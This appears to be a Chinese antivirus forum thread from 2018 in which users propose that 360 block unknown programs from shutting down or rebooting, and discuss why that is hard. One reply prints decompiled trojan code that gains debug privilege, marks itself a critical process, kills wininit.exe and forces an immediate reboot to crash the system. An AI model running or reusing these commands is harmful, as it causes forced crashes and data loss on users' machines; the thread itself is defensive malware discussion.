新的防御功能

显示全部楼层 · 发表于 2018-8-11 09:46:38

本帖最后由 detecttt 于 2018-8-11 09:47 编辑

我建议360增加关机/重启防御。如果有未知程序试图关机/重启，就弹窗询问或自动阻止。
之所以有此建议，是因为这个样本：https://bbs.kafan.cn/thread-2129578-1-1.html经我测试，在断网状态下360未能成功拦截。

显示全部楼层 · 发表于 2018-8-11 09:48:38

@360主动防御

显示全部楼层 · 发表于 2018-8-11 17:55:41

我看成了360成功拦截

显示全部楼层 · 发表于 2018-8-13 10:06:13

我们核实一下

显示全部楼层 · 发表于 2018-8-21 11:52:58

显示全部楼层 · 发表于 2018-8-21 17:45:00

基本无法拦截，因为需要拦截的地方太多。比如某木马，能关机就关机，不能关机杀系统关键进程，不能杀系统关键进程，注册自己为系统关键进程，然后自己退出，强制蓝屏。
void __usercall __noreturn start(int a1@<ebx>, int a2@<edi>, int a3@<esi>)
{
  Sysinit::__linkproc__ InitExe((int)&dword_408094);
  RaisePrivilege((int)&str_SeDebugPrivileg[1], 1u, a1, a2, a3);
  RtlSetProcessIsCritical(1u, 0, 0);
  WinExec("taskkill.exe /F /IM wininit.exe", 0);
  WinExec("C:\\Windows\\System32\\taskkill.exe /F /IM wininit.exe", 0);
  WinExec("shutdown.exe -r -f -t 0", 0);
  WinExec("C:\\Windows\\System32\\shutdown.exe -r -f -t 0", 0);
  System::__linkproc__ Halt0();
}

显示全部楼层 · 发表于 2018-8-26 08:10:39

360 基本是广告软件，没有必要。。。。。。

显示全部楼层 · 发表于 2018-8-27 01:22:14

国内360只要调教一下还是没多少广告的

显示全部楼层 · 发表于 2018-8-30 23:46:51

wowocock 发表于 2018-8-21 17:45
基本无法拦截，因为需要拦截的地方太多。比如某木马，能关机就关机，不能关机杀系统关键进程，不能杀系统关 ...

但是不拦截的话有些病毒会利用重启后主防启动的时间差绕过防御，如：https://bbs.kafan.cn/thread-2129683-1-1.html 里面的第(15)号样本，还有https://bbs.kafan.cn/thread-2128481-1-1.html（下载链接已失效）里的伪勒索（原样本重启后会修改文件后缀，并非真正的勒索）。请问有解决的办法吗？

显示全部楼层 · 发表于 2018-8-31 10:03:56

360_HBM 发表于 2018-8-30 23:46
但是不拦截的话有些病毒会利用重启后主防启动的时间差绕过防御，如：https://bbs.kafan.cn/thread-212968 ...

问题不在于重启后主防启动的时间差，而在于，你怎么绕过主防写入启动项。

[讨论] 新的防御功能